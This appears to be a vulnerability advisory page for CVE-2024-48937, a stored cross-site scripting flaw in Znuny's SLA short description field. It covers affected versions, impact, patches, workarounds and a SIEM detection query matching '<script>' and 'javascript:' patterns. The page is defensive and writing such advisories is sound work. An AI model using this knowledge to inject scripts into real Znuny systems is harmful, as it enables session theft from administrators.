CVE-2024-48937
📋 TL;DR
This cross-site scripting (XSS) vulnerability in Znuny allows attackers to inject malicious JavaScript code into the short description field of SLA settings in Activity Dialogues. When viewed by administrators or other users with access to these dialogues, the code executes in their browser context. Affected users include anyone running vulnerable versions of Znuny LTS 6.5.1-6.5.10 or 7.0.1-7.0.16.
💻 Affected Systems
- Znuny
📦 What is this software?
Znuny by Znuny
Znuny by Znuny
Znuny by Znuny
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, perform actions as authenticated users, redirect users to malicious sites, or compromise the Znuny instance.
Likely Case
Attackers with access to SLA configuration could inject malicious scripts that execute when administrators view Activity Dialogues, potentially leading to session hijacking or unauthorized actions.
If Mitigated
With proper input validation and output encoding, the injected scripts would be rendered harmless as text rather than executable code.
🎯 Exploit Status
Exploitation requires access to modify SLA settings, typically requiring authenticated user privileges. The vulnerability is straightforward XSS with JavaScript execution in browser context.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: LTS 6.5.11 and 7.0.17
Vendor Advisory: https://www.znuny.org/en/advisories/zsa-2024-05
Restart Required: Yes
Instructions:
1. Backup your Znuny instance and database. 2. Download the patched version from the official Znuny website. 3. Follow the Znuny upgrade documentation for your specific version. 4. Restart the Znuny service after upgrade completion.
🔧 Temporary Workarounds
Input Validation Filter
allImplement server-side input validation to sanitize HTML/JavaScript from SLA short description fields
Output Encoding
allApply proper HTML encoding when displaying SLA short descriptions in Activity Dialogues
🧯 If You Can't Patch
- Restrict access to SLA configuration to only essential administrators
- Implement web application firewall (WAF) rules to block XSS payloads in SLA-related requests
🔍 How to Verify
Check if Vulnerable:
Check your Znuny version via Admin interface or by examining the installed package version. If running LTS 6.5.1-6.5.10 or 7.0.1-7.0.16, you are vulnerable.Check Version:
Check via Znuny admin interface or examine package/installation files for version informationVerify Fix Applied:
After upgrading, verify the version shows LTS 6.5.11+ or 7.0.17+. Test by attempting to inject basic XSS payloads in SLA short description field and confirm they are properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual modifications to SLA settings
- JavaScript code patterns in SLA description fields
- Multiple failed XSS attempts in web logs
Network Indicators:
- HTTP requests containing JavaScript in SLA-related parameters
- Unusual traffic patterns to SLA configuration endpoints
SIEM Query:
web_requests WHERE (url CONTAINS 'SLA' OR url CONTAINS 'ActivityDialog') AND (parameters CONTAINS '<script>' OR parameters CONTAINS 'javascript:')